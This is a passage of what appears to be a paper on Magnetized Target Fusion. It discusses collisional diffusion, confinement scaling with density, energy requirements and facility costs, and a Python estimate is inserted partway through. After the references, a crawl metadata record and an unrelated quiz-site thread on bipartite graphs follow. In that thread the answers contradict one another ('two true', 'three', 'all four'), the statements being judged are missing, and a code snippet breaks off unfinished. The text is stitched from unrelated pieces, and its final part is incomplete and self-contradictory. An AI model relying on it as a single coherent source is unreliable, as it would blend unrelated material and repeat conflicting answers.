Thus at 10 keV and 10^14 cm^-3, σ_C ~ 7000 barns. This Coulomb collision frequency, or reciprocal of the ion-ion collision time, is extensively discussed in the standard textbooks. Because of the accumulated effects of small-angle scattering, the frequency of Coulomb collisions is proportional to ln Λ, a factor that depends weakly upon temperature and density. The Coulomb logarithm is often taken as a constant about equal to 20, but even for rough estimates we will calculate ln Λ when it arises, because the range of density we will consider (10^14-10^26 cm^-3) corresponds to ln Λ changing by more than a factor of 3. At a temperature of 10 keV, the cross section or frequency for Coulomb scattering is larger than the cross section or frequency of fusion reactions by a factor of 2000-6000 for density between 10^26 cm^-3 and 10^14 cm^-3 respectively. Therefore, the number of collisions (N) that occur during a burn time is calculated to be:

N = τ_burn/τ_ii = 2 f v_i σ_C / <σ_DT v>     (7)

For nτ_E = 3×10^14 cm^-3 sec, the burn time is between 60 and 180 ion-ion collision times as density varies from 10^26 cm^-3 to 10^14 cm^-3. In summary, we conclude that, independent of the fuel density over a wide range of density, collisional diffusive processes are unavoidable when fusion fuel is assembled for a time long enough to produce energy gain.

D. The Nature of Energy Diffusion

Even if fuel is held in pressure balance for the necessary burn time, it has been historically difficult to achieve the required global energy confinement time. Much of MFE fusion research has been devoted to understanding the many modes of plasma motion that transport energy in addition to classical collisional processes. With ICF, there is less uncertainty about loss processes, because the absence of a magnetic field simplifies the transport physics. In that case electron thermal conduction is the dominant loss process. In the ICF approach parameters are chosen so that even electron thermal conduction is consistent with the Lawson condition. One could say that ICF is the "worst case" for thermal losses when compared with any type of magnetic configuration.

Classical diffusion. We review now the lower bound on energy confinement represented by classical diffusion. In MFE fusion literature, the global energy confinement time is usually expressed in terms of thermal diffusivity:

τ_E ~ a²/χ     (8)

where a is the characteristic dimension across which heat diffuses and χ is the thermal diffusivity. The value of χ (the same as thermal conductivity divided by density) is derived by calculating the energy flux in the presence of a temperature gradient. Thermal diffusion can also be viewed as a random walk of particles.
After each collision, a particle moves one step at random either up or down the temperature gradient. Heat conduction is the diffusion of cold particles up the gradient and hot particles down the gradient with no net flux of particles. The essential feature of the random walk is that after N collisions, there is a binomial distribution for particle location, and it has a width proportional to N^1/2. If the step size is λ, then the standard deviation of the distribution of particle locations after N collisions is a, given by

a = N^1/2 λ     (9)

If the collision time is τ, the number of collisions is N = t/τ, so we can also write Eqn. 9 as

t = (a/λ)² τ     (10)

Eqn. 9 indicates that if N collisions are needed before heat dissipates, then the fuel must have a characteristic size greater than a. Equivalently, Eqn. 10 gives the time to dissipate heat (the energy confinement time) in terms of the number of steps across the characteristic size, (a/λ), and the time per step or collision time.

Classical diffusion without a magnetic field. To apply the random-walk argument to electron thermal conduction, we equate the step size to a plasma mean free path λ. Electrons have a larger thermal speed and a shorter collision time, such that the mean free path λ is the same for either ions or electrons:

λ = 1/(n σ_C) = v_i τ_ii = v_e τ_ee     (11)

where v_i,e is the ion, or electron, thermal speed. Electrons collide more frequently by a factor of (m_i/m_e)^1/2, or about 60 for a DT mixture. Therefore, if we consider high density where ions make about 60 collisions, then electrons make about 3600 collisions during the fusion burn time. The size of a plasma with burn time long enough to allow 3600 electron-electron collisions is

a = (3600)^1/2 λ     (12)

For ICF, where the ignition hot spot density is about 10^25 cm^-3, the mean free path is 0.7 microns; this simple estimate of Eqn. 12 for the hot spot radius is 42 microns. More detailed calculations [Lindl 95] give about the same value.

Classical diffusion with a magnetic field. To apply the random-walk argument to magnetized plasma is more difficult, because the step size depends upon complicated particle orbits in the magnetic field. However, for poloidal-field dominated configurations like the Reversed Field Pinch, the spheromak, and the Field-Reversed Configuration (FRC), and for tokamaks, detailed studies give the simple prescription that the step size can be taken as the ion gyro radius calculated in the poloidal magnetic field [Boozer 83]. (In a torus the toroidal direction is the long way around the torus, and the poloidal direction is the short way around.) In the direction perpendicular to a magnetic field, the classical ion heat conduction dominates because the ions have a larger gyro radius. Therefore, we can estimate that the minimum required size of a fusion system to diffuse heat slowly enough to meet Lawson, say 180 ion-ion collision times, is

a = (180)^1/2 r_i     (13)

where r_i is the ion gyro radius in the poloidal magnetic field. The tokamak banana-regime formulas for neoclassical transport theory give about 20 r_i instead of the approximate estimate of 13 r_i given by Eqn. 13. Because of anomalous transport, the design radius of ITER is about 5 times larger than the neoclassical limit (i.e. a_ITER ≈ 100 r_i).

E. Characteristic Step Sizes Decrease as Density Increases

Comparing Eqns. 8 and 10, we see that χ has the form of a step size squared times a collision frequency. For classical transport,

Electron thermal conduction: χ_e ~ λ² ν_ee     (14)

Ion cross-field transport: χ_i ~ r_i² ν_ii     (15)

The mean free path (λ), which depends on temperature and density, is plotted in Fig. 2 for 10 keV temperature. The gyro radius (r_i), which depends mainly on density, is also plotted in Fig. 2, assuming constant poloidal beta (β_i), where β_i is the ratio of ion pressure to poloidal field pressure (β_i = 8π n k T_i / B_p²). The density dependence can be seen by writing the gyro radius as

r_i = v_i/ω_ci = (c/ω_pi) β_i^1/2     (16)

where ω_ci is the ion cyclotron frequency in the poloidal magnetic field, c is the speed of light, and ω_pi is the ion plasma frequency,

ω_pi = (4π n e²/m_i)^1/2 (cgs units)     (17)

Poloidal beta in tokamaks and the above-mentioned configurations is observed not to differ much from unity. In the spirit of a survey of minimum system size for fusion, Fig. 2 gives useful guidance. The dimensions of a system without magnetic insulation become unacceptably large at low density. The classical limit for the size of a magnetized plasma is seen to be quite small as density increases. If the anomaly factor assumed in the ITER design, and observed with tokamaks having density in the vicinity of 10^14 cm^-3, were to apply at higher density, then Lawson should be possible at 10^20 cm^-3 in a tokamak with a minor radius of 2.8 mm! This dramatic reduction in size at higher density provides much of the motivation for MTF.

Figure 2. Plots of characteristic step sizes and poloidal magnetic field strength assuming poloidal beta = 1 vs. fuel density for a plasma with 10 keV temperature.

Speculation on anomalous transport. Anomalous transport mechanisms are still a subject of unfinished research. Clearly, all possibilities cannot be anticipated, but the following can be noted. Generally the form of χ is a product of characteristic lengths times a frequency. The characteristic lengths in a plasma normally identified are λ, λ_D, c/ω_pi, c/ω_pe, r_i, and r_e. As already noted, c/ω_pi and r_i are only different by a factor of order unity, and therefore the gyro radius in Fig. 2 is also approximately the same as c/ω_pi. The gyro radius r_e (and thus c/ω_pe) is smaller than the gyro radius r_i by a factor of (m_i/m_e)^1/2. The Debye length λ_D has the same density dependence as the electron gyro radius. Therefore the variation of all the usual characteristic lengths with density is correctly inferred from Fig. 2, and a reasonable conjecture is that the tendency towards smaller size at higher density is true for anomalous transport as well as for classical transport.

III. Plasma Energy Reduced at High Density

To quantify the variation of diffusion step sizes with density in terms that come closer to economic value, we show in Fig. 3 the thermal energy contained by a plasma with characteristic dimension a. Three different configurations are included in Fig. 3: ICF-relevant unmagnetized fuel, tokamaks, and a generic MTF plasma taken to be a compact torus (CT). We assume that when density is varied for a given configuration, size is adjusted to be the minimum necessary to provide nτ_E = 3×10^14 cm^-3 sec at 10 keV temperature. Specific assumptions for each configuration are summarized in the table following Fig. 3.

A. ICF Energy Requirements

For ICF we see a very strong dependence of energy upon density, and thus the importance of compressing to high density. By compressing to a density of approximately 10^25 cm^-3, the energy in the hot spot according to Fig. 3 is approximately 30 kJ, which is similar to the value anticipated in the design of NIF [Lindl 95].
Achieving such a high density requires an implosion velocity of about 30-40 cm per microsecond and a radial convergence of between 30 and 40. The NIF laser design, with 1.8 MJ and 500 TW, has enough energy and power to produce these conditions even with the inefficiency of indirect drive. However, if the hot-spot density were to be reduced, the energy requirements would be considerably increased as shown in Fig. 3, and the power requirements would also be increased to achieve the same nt E. Thus, the ICF approach utilizes very high density to achieve fusion with minimum energy, but the driver requirements are extremely demanding and expensive. B. Tokamak Energy Requirements Tokamaks are included in Fig. 3 for academic interest, even though high-density operation of a tokamak-like configuration is not being considered. The poloidal magnetic field required at any given density is plotted in Fig. 2. For the assumed value of safety factor (q) and aspect ratio, the toroidal field required would be approximately a factor of ten higher than the poloidal field. Thus, the magnetic energy would be 100 times as large as the plasma thermal energy plotted in Fig. 2. The cost of a tokamak is well known to be strongly tied to the cost of the magnets. The important aspect of the tokamak is that much more is known about transport than for any other configuration. A useful summary of tokamak transport formulas can be found in the textbook by Kadomtsev [Kadomtsev 92]. We plot both the classical limit for confinement (neoclassical in the banana, transition, and Pfirsch-Schluter regimes as density increases) and some empirically based models for anomalous transport. The anomalous transport curves show the anticipated tendency that system size becomes small at increasing density. One concludes from these plots that if the technology were available to operate tokamaks at higher density, the size and cost could be reduced. C. MTF Energy Requirements. For MTF compression by a liner, there are many possible magnetic configurations. To make estimates for Fig. 3, we have chosen a compact toroid (CT) plasma as generic for any magnetic configuration. Specifically the CT curves in Fig. 3 are calculated assuming the plasma is an FRC, which has ideally only poloidal magnetic field [Tuszewski 88]. Similar values apply to a spheromak. In that case a toroidal field comparable in magnitude to the poloidal field of the FRC would be required [Jarboe 94]. CTs require more energy than a tokamak at a given density because CTs need more volume to achieve the same effective radius or insulating distance. A prolate FRC, as is commonly studied in experiments, has an effective radius equal to the distance from the field null to the outer edge, which is approximately 0.3 of the small radius of the prolate spheroid. Thus the FRC estimate for energy may be conservatively high in Fig. 3, although modeling of wall-plasma interactions tend to show spatial profiles that resemble an FRC-like profile (Siemon 97). Figure 3. Energy requirements vs. fuel density for various configurations and transport assumptions assuming nt E = 3x1014 cm-3 sec, T = 10 keV, and poloidal b = 1. Configuration Transport Comments ICF Electron thermal conduction Spherical plasma with size given by Eqn. 12. Density of ~1025 cm-3 corresponds to NIF. Tokamak Neoclassical, anomalous neo-Alcator, and anomalous ITER-89P Aspect ratio (2.9), poloidal beta (1.0), and safety factor q (3.0) are held constant at ITER-like values. 
Compact Torus (CT) Classical or Bohm Geometry of a prolate FRC assumed for illustration with length to diameter ratio of 3. The amount of energy required for fusion conditions depends upon the global energy confinement time. Fig. 3 indicates that compressed plasma energy between about 30 kJ and 10 MJ is required in the MTF regime (density of 1020 cm-3), if plasma transport is between classical and Bohm. For the larger Bohm requirement of 10 MJ, the required liner kinetic energy would be tens of MJs, a few times the final plasma energy. One striking difference between the MFE and MTF regimes of density is that Bohm is an acceptable possibility at MTF density, while as shown in Fig. 3, Bohm is totally unacceptable at 1014 cm-3. The curve labeled Bohm deserves additional comment. In the early days of fusion research Bohm was introduced as an empirical diffusivity [Spitzer 62] equivalent to the following: c BOHM = c i (w cit ii)/16, (18) where w cit ii = l /ri is the magnetization parameter. The factor of 16 has no theoretical basis. It is interesting to note that apart from the factor of 16, c BOHM is the geometric mean or logarithmic average of c i and c e given in Eqns. 14 and 15. Thus Bohm can be thought of as intermediate between classical magnetized and unmagnetized confinement. Kadomtsev describes how there are situations where macroscopic convection can lead to energy transport with a global Bohm confinement time [Kadomtsev 92]. Studies of wall-confined MTF-type plasma by Vekshtein show how classical confinement can lead to a Bohm-like scaling [Vekshtein 90]. Even more interesting is that experimental data from a number of carefully studied magnetic configurations, including Reversed Field Pinches, spheromaks, and FRCs, is generally as good as Bohm or better. Global energy confinement time can be worse than Bohm when other non-diffusive processes dominate. Examples are radiation because of impurities, or plasma flow out of the system at a speed comparable to the thermal speed. Radiation by impurities is always a concern and places an upper limit on the allowed impurity concentration. Plasma flow cannot be ruled out in general, but the conjecture here is that target plasma configurations can be found for which a pressure equilibrium exists between the metal liner boundary and the fuel, and thus flow is reduced to nothing worse than convective motions. Close proximity of a conducting boundary should provide a stabilizing influence on magneto-hydrodynamic modes, especially since magnetic fields do not penetrate a conducting boundary on the short time scale of interest for MTF. Spheromaks and FRCs are two examples of CTs for which there are data to support this conjecture. We conclude Bohm represents a reasonable, even conservative, expectation for achievable global energy confinement based on previous experimental results, assuming impurities can be avoided by careful experimental technique. IV. The Size and Cost of Ignition Facilities Only a rough connection can be made between cost and plasma energy plotted in Fig. 3. For each of the configurations, however, one would expect that the indicated reduction of energy as density increases would result in a reduction of costs for the required facility to create the ignition-grade plasma. Even an approximate connection is adequate for present purposes, given the many decades of system size plotted in Fig. 3. Note that the left-hand scale varies by 12 orders of magnitude. 
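Before turning to facility costs, the scale of the MTF regime can be made concrete with a rough sketch (not from the paper) that evaluates Eqns. 13 and 16 at n = 10^20 cm^-3 and 10 keV. The assumptions are poloidal β_i = 1, an average DT ion mass of 2.5 amu, cgs constants, and the ~100 r_i ITER-like anomaly factor quoted in Section II.

```python
import math

# Rough cross-check of the step-size scaling (Fig. 2) at MTF density,
# using cgs units and the relations quoted in the text (Eqns. 13 and 16).
n = 1.0e20              # cm^-3, MTF fuel density
kT = 10e3 * 1.602e-12   # 10 keV in erg
m_i = 2.5 * 1.673e-24   # g, average DT ion mass (assumed)
e = 4.803e-10           # statcoulomb
c = 3.0e10              # cm/s

B_p = math.sqrt(8.0 * math.pi * n * kT)   # G, poloidal field for beta_i = 1
v_i = math.sqrt(kT / m_i)                 # cm/s, ion thermal speed
w_ci = e * B_p / (m_i * c)                # rad/s, ion cyclotron frequency
r_i = v_i / w_ci                          # cm, ion gyro radius

a_classical = math.sqrt(180.0) * r_i      # Eqn. 13, about 13 r_i
a_anomalous = 100.0 * r_i                 # ITER-like anomaly factor, ~100 r_i

print("B_p ~ %.1f MG" % (B_p / 1e6))                     # ~6 MG
print("r_i ~ %.0f microns" % (r_i * 1e4))                # ~25 microns
print("a (classical) ~ %.2f mm" % (a_classical * 10))    # a few tenths of a mm
print("a (100 r_i) ~ %.1f mm" % (a_anomalous * 10))      # ~2.5 mm, cf. the 2.8 mm quoted earlier
```

The millimetre-to-centimetre scale that comes out of this estimate is what ultimately drives the large cost differences summarized in the next table.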
We list in Table 1 costs for recently designed ignition-class facilities in each of the regimes of MFE, ICF, and MTF. In the case of MTF we base the cost for an ignition facility upon the ATLAS pulsed-power facility, recently designed and under construction by Defense Programs at Los Alamos [Trainor 97]. ATLAS should be able to deliver 5-10 MJ to an imploding liner, which makes it suitable for a considerable range of possible MTF experiments. Although the primary mission of ATLAS is not MTF, a reasonable number of additional experiments to test MTF are consistent with current plans for the facility. For the purpose of estimating MTF ignition-grade facility costs, we assume that 1) the 35-MJ of stored energy in ATLAS is enough to implode a liner-plasma configuration to ignition (see Fig. 3), and 2) the additional cost for the plasma target preparation is small compared with the \$50-million cost of the ATLAS facility. The purpose of Table I is to compare facility costs needed for a fusion energy development program. The fact that ATLAS is being built for other reasons is simply a fortunate circumstance. The research effort expended to date on MTF has been minuscule compared with the other two approaches to fusion, and so the cost of achieving ignition conditions is obviously much less certain. However, the advantage appears so large that the accuracy of the estimate is not very important. Table 1. Approximate Cost of Ignition Facilities Concept Plasma Thermal Energy Facility Cost MFE/ITER 1 GJ \$10 billion ICF/NIF 30 kJ \$1 billion MTF/ATLAS ~ 10 MJ ~\$50 million V. Near Term Prospects for MTF Research A. Typical MTF Parameters The main points of this paper, which are contained in Fig. 3 and Table 1, argue for starting a new thrust in fusion energy research. In this section we discuss some aspects of how to begin that effort. Our concept for a liner-driven plasma implosion suggests approximate values for initial and final plasma parameters as given in Table 2. Table 2. Representative Conditions for an Adiabatic Implosion Parameter Desired Final Conditions Required Initial Plasma if Kv=100 Required Initial Plasma if Kv=1000 Temperature 10 keV 460 eV 100 eV Density 1020 cm-3 1018 cm-3 1017 cm-3 B Field 10 MG 100 kG 100 kG Liner inner radius 5 mm 5 cm 5 cm To illustrate the required initial target-plasma conditions, we assume adiabatic compression (pVg =const) with a volumetric compression Kv = 100 or 1000, corresponding to cylindrical, or spherical, radial compression of 10 respectively. The adiabatic approximation is justified according to time-dependent calculations taking thermal and radiation losses into account [Lindemuth 83], and the parameter space for MTF is found to be quite large, assuming an implosion velocity on the order of 106 cm/sec. B. Target Plasma Possibilities. Among the many possible magnetic configurations that would be possible for the target plasma, the ones currently receiving attention in our awareness are: 1) the MAGO-type of accelerated diffuse-z-pinch plasma [Lindemuth, 96], 2) an expanded high-density-fiber z pinch inside a conducting boundary [Wysocki 97], and 3) compact toroids [Ryutov 96]. An approach that uses energy from a high-power e-beam driver to form a magnetized plasma has also been reported [Chang 78]. Extensive research on compact toroids, the spheromak and Field-Reversed Configuration, began in about 1980. The review articles by Tuszewski and Jarboe have hundreds of references [Tuszewski 88, and Jarboe 94]. 
By definition, a CT is a self-contained magnetized plasma that can be moved from one spatial location to another. Thus, CTs are an obvious candidate for inserting a plasma target into an imploding metal liner. Unfortunately, most fusion-related liner research ended about the same time that CT work began, so most of the information gained from CT research was not available to the early liner researchers. A few experiments studying the implosion of an FRC-type of CT were done in Russia [Kurtmullaev 82]. Most CT research was done at much lower density than is needed for MTF. The RACE experiments at LLNL are a notable exception [Hammer 91]. There is no obvious problem in forming CTs at higher density, and experiments to move in that direction would be desirable. The MAGO and expanded fiber z pinch are diffuse z-pinch magnetic configurations. The outstanding attraction of these approaches is that the technology for plasma formation is reasonably compatible with liner implosion technology, and is less complicated than for CTs. For MAGO at least, plasma density and temperature appear suitable for proceeding with MTF implosion experiments [Lindemuth 95]. More refined measurements are still needed to characterize global energy confinement in both the MAGO and expanded fiber plasmas. The diffuse z pinch has well known limitations with regard to stability, and containment of energetic particle orbits. However, simulations show [Sheehey 89] that an unstable plasma inside a conducting boundary can evolve to a stable state (known as a Kadomtsev-stable profile). In such a state, the energy confinement may be adequate on the time scale of an MTF implosion. The fact that most alpha particles generated near peak compression would be lost is not a major consideration for the batch-burn approach we have assumed for MTF. 1. Liner Technology and Facilities are Available. The advances in liner technology of the past few years are impressive [Chernyshev 97]. More than enough liner velocity and implosion symmetry has been demonstrated compared with the detailed requirements for an MTF liner system discussed elsewhere [Lindemuth 96, Siemon 97, Ryutov 96, and Schoenberg 98]. A quasi-spherical implosion of unmagnetized plasma has also been reported [Degnan 96]. A number of existing facilities supported by DOE’s Defense Programs and DOD would be suitable for a variety of MTF experiments. These include the Z capacitor bank at Sandia National Laboratory, the Shiva Star capacitor bank at Phillips Air Force Laboratory, the Pegasus capacitor bank at Los Alamos National Laboratory, the Ranchero explosively-driven electrical generators at Los Alamos, and the ATLAS capacitor bank under construction at Los Alamos. These facilities and expertise allow significant leveraging of research dollars, which gives additional incentive for MTF research. D. Major Technical Issues. MTF can be conceptually separated into three inter-related aspects: target plasma formation and confinement properties, liner-driver implosion, and target-plasma compression. 
The major technical issues are: Issues of Target Plasma Formation and Confinement Properties • plasma parameters on the proper adiabat for heating to ignition • suitable magnetic topology for magnetohydrodynamic stability and adequate thermal insulation • plasma-wall interactions leading to high-Z impurities and concomitant plasma radiation losses Liner-Driver Implosion Issues • symmetric implosions of a liner at approximately 106 cm/s (a velocity well within the range of what has been demonstrated in Defense Program experiments). • development of liner implosion configurations that match target-plasma requirements for a conducting boundary throughout the implosion • convergence ratios of roughly 10 in a stable quasi-spherical geometry Target Plasma Compression Issues • technical compatibility between plasma formation and liner-implosion technologies • accelerated mixing of wall and plasma material during the implosion, resulting for example from Rayleigh-Taylor instabilities in the liner • plasma thermal transport during the implosion • diagnostic methods under conditions of energetic implosions We recommend a multi-institutional MTF research program to address these important experimental and theoretical questions. In addition, studies are needed on how MTF would best be utilized for electricity generation or other applications. Qualitatively the intrinsically pulsed nature of MTF makes it similar to ICF in its potential application. Early studies of an electrical power plant based on liner technology [Krakowski 78] indicated the basic feasibility of a pulsed liner-driven system, and identified numerous technology issues that must be solved. An intriguing more recent study of power generation using MHD conversion of fusion energy [Logan 93] indicates that MTF is well matched to the requirements of an MHD conversion system. The energy from 14-MeV neutrons would be used to vaporize and heat a lithium-containing blanket to 1 or 2 eV. Then MHD conversion gives higher efficiency and a greatly reduced balance of plant cost leading to considerably less expensive electricity compared with conventional MFE reactor concepts. VI. Conclusions We briefly reviewed some very elementary features of all the standard fusion approaches. The main assumptions were that the fusion fuel is deuterium and tritium with a 10 keV Maxwellian velocity distribution. We emphasized the variation of quantities with fuel density and observed that the system size becomes small, and energy requirements are much reduced, when fuel density is made considerably larger than in conventional MFE systems. This general conclusion, which has been noted by many researchers in the past, warrants renewed attention today as the fusion program restructures itself within today’s budget limitations. The reasons for embarking on an MTF research effort at the present time are several: • The cost of development for fusion has become a major consideration in recent years, and MTF appears to offer advantages compared with MFE and ICF. • The pulsed power facilities of Defense Programs, both DOE and DOD, are remarkably well matched to what is needed to investigate MTF. • In the twenty years since MTF-like concepts were last seriously pursued in the United States, the theoretical understanding and experimental methods of plasma science as well as the technology of high-energy liner implosions have advanced significantly. The interesting regime we call Magnetized Target Fusion occurs at fuel density of about 1020 cm-3. 
The MTF regime may be an optimum in the sense of using the maximum possible magnetic field for insulation of the fuel, and thus the smallest possible system size, without going to the extreme density of ICF. This new thrust in fusion research has the potential to achieve the lowest possible development cost. We believe that the arguments presented here are robust in nature and give a valid basis for recommending a new research thrust in magnetic fusion energy. Given the global importance of long-term energy R&D, adding MTF as a new complementary element to MFE and ICF in the portfolio of fusion approaches seems well justified.

Acknowledgements

We appreciate receiving encouragement to examine MTF from John Browne, Steve Younger, and Al Sattelberger. We also thank our colleagues Carl Ekdahl, Bob Reinovsky, and others in the pulsed power community at Los Alamos for providing expert advice on liner technology.

References

Bangerter 97. R. Bangerter, "The U.S. Heavy Ion Fusion Program," 12th International Symposium on Heavy Ion Inertial Fusion and Workshop on Atomic Physics, Heidelberg, Germany, September 22-27, 1997.

Boozer 83. A. H. Boozer, Phys. Fluids 26, 496 (1983).

Chang 78. J. Chang, M. M. Widner, A. V. Farnsworth, R. J. Leeper, T. S. Prevender, L. Baker, J. N. Olsen, in High Power Electron and Ion Beam Research and Technology (Proc. 2nd Int. Top. Conf. Ithaca, NY, 1977) Vol. 1, Cornell University (1978) 195.

Chernyshev 97. V. K. Chernyshev, "Study of Condensed High Energy Liner Compression," 11th International Pulsed Power Conference, Baltimore, Maryland, June 1997, and other papers of this conference.

Degnan 96. J. H. Degnan, S. K. Coffey, D. G. Gale, J. D. Graham, et al., "Solid spherical and cylindrical shell z-pinches used to compress hot hydrogen working fluid," 1996 IEEE International Conference on Plasma Science, June 3-5, Boston (1996), 43. Also, J. H. Degnan, F. M. Lehr, J. D. Beason, G. P. Baca, D. E. Bell, A. L. Chesley, S. K. Coffey, D. Dietz, D. B. Dunlap, S. E. Englert, T. J. Englert, D. G. Gale, J. D. Graham, J. J. Havranek, C. D. Holmberg, T. W. Hussey, R. A. Lewis, C. A. Outten, R. E. Peterkin, D. W. Price, N. F. Roderick, E. L. Ruden, U. Shumlak, G. A. Smith, P. J. Turchi, Phys. Rev. Ltrs. 74, 98 (1995).

Gerwin 79. R. A. Gerwin, R. C. Malone, "Adiabatic Plasma Heating and Fusion-Energy Production by a Compressible Fast Liner," Nucl. Fusion 19(2), 155 (1979).

Gross 76. B. Feinberg, "An experimental study of hot plasma in contact with a cold wall," Plasma Physics 18, 265 (1976).

Hammer 91. J. H. Hammer, J. L. Eddleman, C. W. Hartman, H. S. McLean, A. W. Molvig, "Experimental demonstration of compact torus compression and acceleration," Phys. Fluids B 3, 2236 (1991).

Holdren 95. The U.S. Program of Fusion Energy Research and Development, The President’s Committee of Advisors on Science and Technology (PCAST), "Report of the Fusion Review Panel," J. Holdren, Chairman (July 1995).

Jarboe 94. T. R. Jarboe, "Review of spheromak research," Plasma Phys. Control. Fusion 36, 945 (1994).

Kadomtsev 92. B. B. Kadomtsev, Tokamak Plasma: A Complex Physical System (Institute of Physics Publishing, Bristol and Philadelphia, 1992).

Krakowski 78. R. W. Moses, R. A. Krakowski, R. L. Miller, "A conceptual design of the fast-liner reactor (FLR) for fusion power," Los Alamos Scientific Laboratory informal report LA-7686-MS (1979) [available on the LANL library web site].

Kurtmullaev 82. S. G. Alikhanov, V. P. Bakhtin, A. G. Es’kov, R. Kh. Kurtmullaev, V. N. Semenov, E. F. Strizhov, N. P. Kozlov, V. I. Khvesyuk, A. V. Yaminskij, "Three-dimensional Plasma Compression in a Z-Pinch Liner System – Transport and Compression of a Compact Torus by a Quasi-Spherical Liner," 8th IAEA Fusion Energy Conference III, 319 (1982).

Lindemuth 83. I. R. Lindemuth, R. C. Kirkpatrick, "Parameter space for magnetized fuel targets in inertial confinement fusion," Nuclear Fusion 23(3), (1983).

Lindemuth 95. I. R. Lindemuth, et al., "Target Plasma Formation for Magnetic Compression/Magnetized Target Fusion," Phys. Rev. Ltrs. 75(10), 1953-1956 (September 1995).

Lindemuth 96. I. Lindemuth, C. Ekdahl, R. Kirkpatrick, R. Reinovsky, R. Siemon, P. Sheehey, F. Wysocki, V. Chernyshev, V. Mokhov, A. Demin, S. Garanin, V. Korchagin, I. Morozov, V. Yakubov, J. Eddleman, J. Hammer, D. Ryutov, A. Toor, D. McDaniel, J. Degnan, G. Kiuttu, R. Peterkin, Jr., "Magnetic Compression / Magnetized Target Fusion (MAGO/MTF): A Marriage of Inertial and Magnetic Confinement," 16th IAEA Fusion Energy Conference, Montreal, Canada, October 7-11, 1996.

Lindl 95. J. Lindl, "Development of the Indirect-Drive Approach to Inertial Confinement Fusion and the Target Physics Basis for Ignition and Gain," Phys. of Plasmas 2(11), 3933-4024 (November 1995).

Logan 93. B. G. Logan, "Inertial Fusion Reactors using Compact Fusion Advanced Rankine (CFARII) MHD Conversion," Fusion Engineering and Design 22, 151-192 (1993).

Pavlovskii 96. Paper at Megagauss V (1996).

Robson 76. A. E. Robson, P. J. Turchi, "NRL Linus Program," Pulsed High Beta Plasmas (3rd Topical Conference on Pulsed High Beta Plasmas, Pergamon Press, Oxford, 1976), 477. Also: P. J. Turchi, "Review of the NRL Liner Implosion Programme," Megagauss Physics and Technology (Plenum Press, New York, 1980), 375.

Ryutov 96. R. P. Drake, J. H. Hammer, C. W. Hartman, L. J. Perkins, D. D. Ryutov, "Submegajoule Liner Implosion of a Closed Field Line Configuration," Fusion Tech. 30, 310-325 (1996).

Schoenberg 98. K. Schoenberg et al., "Application of the ATLAS facility to MTF Experiments," to be published.

Sheehey 89. P. Sheehey, "Computational Modeling of Wall-supported Dense Z-Pinches," Proc. of Second International Conference on Dense Z-Pinches, Laguna Beach, California, April 26-28, 1989.

Sheffield 94. J. Sheffield, "The physics of magnetic fusion reactors," Reviews of Modern Physics 66(3), 1015 (1994).

Sherwood 81. A. R. Sherwood and F. L. Ribe, "Fast-Liner-Compression Fusion Systems," Fusion 1, Part B, 59-78 (1981).

Siemon 97. R. E. Siemon, "Magnetized Target Fusion - A High-Density Pulsed-Power Approach to Fusion," Los Alamos National Laboratory talk LA-UR-97-764, presented at the Innovative Confinement Concepts Workshop, Marina del Rey, California, March 3-6, 1997.

Spitzer 62. L. Spitzer, Physics of Fully Ionized Gases (Interscience Publishers, New York & London, 1962), p. 47.

Trainor 97. J. Trainor, et al., "Overview of the Atlas Project," Proc. of 11th IEEE International Pulsed Power Conference (Baltimore, MD, June 29 - July 2, 1997, to be published).

Tuszewski 88. M. Tuszewski, "Field Reversed Configuration," Nuclear Fusion 28(11), 2033-2092 (1988).

Vekshtein 90. G. E. Vekshtein, "Magnetothermal Processes in Dense Plasma," Rev. Plas. Physics 15, 1 (1990).

Wysocki 97. F. J. Wysocki, R. E. Chrien, G. Idzorek, H. Oona, D. O. Whiteson, R. C. Kirkpatrick, I. R. Lindemuth, and P. T. Sheehey, "Progress With Developing A Target For Magnetized Target Fusion," Proc. of 11th IEEE International Pulsed Power Conference (Baltimore, MD, June 29 - July 2, 1997, to be published).
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8292484879493713, "perplexity": 2523.663350932596}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-04/segments/1547583657151.48/warc/CC-MAIN-20190116093643-20190116115643-00314.warc.gz"}
https://gateoverflow.in/282270/zeal-test-series-2019-graph-theory-graph-connectivity?show=347801
Answers and comments (the four statements of the original question are not reproduced on this page):

• Statements 1 and 2 are false; statements 3 and 4 are true, i.e. two of the statements are true.
• "I also got 3 and 4 as right." / "Arvin bhai, they have given the answer as 4."
• All four options are correct: 1) consider $K_{2}$; 2) see the example given in the other answers; 3) consider $K_{2}$; 4) consider $C_{6}$.
• A suitable example for statements 2, 3 and 4 given above: every cycle graph with an even number of vertices is a bipartite graph; hence 3 will be the answer. (Edited: statements 2, 3 and 4 are correct.)
• "@BASANT KUMAR, how is $C_{5}$ a bipartite graph?" — "That was my mistake, now corrected."
• "All four options are true."
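As a quick check of the examples mentioned above, here is a minimal sketch in plain Python (the helpers `is_bipartite` and `cycle_graph` are ours, not part of the original question): a BFS 2-colouring confirms that $K_{2}$ and even cycles such as $C_{6}$ are bipartite, while odd cycles such as $C_{5}$ are not.

```python
# BFS 2-colouring test for bipartiteness of an undirected graph.
from collections import deque

def is_bipartite(adj):
    """adj: dict mapping vertex -> iterable of neighbours (undirected graph)."""
    colour = {}
    for start in adj:
        if start in colour:
            continue
        colour[start] = 0
        queue = deque([start])
        while queue:
            u = queue.popleft()
            for v in adj[u]:
                if v not in colour:
                    colour[v] = 1 - colour[u]   # opposite colour to u
                    queue.append(v)
                elif colour[v] == colour[u]:
                    return False                # odd cycle found
    return True

def cycle_graph(n):
    """The cycle C_n as an adjacency dict."""
    return {i: [(i - 1) % n, (i + 1) % n] for i in range(n)}

K2 = {0: [1], 1: [0]}
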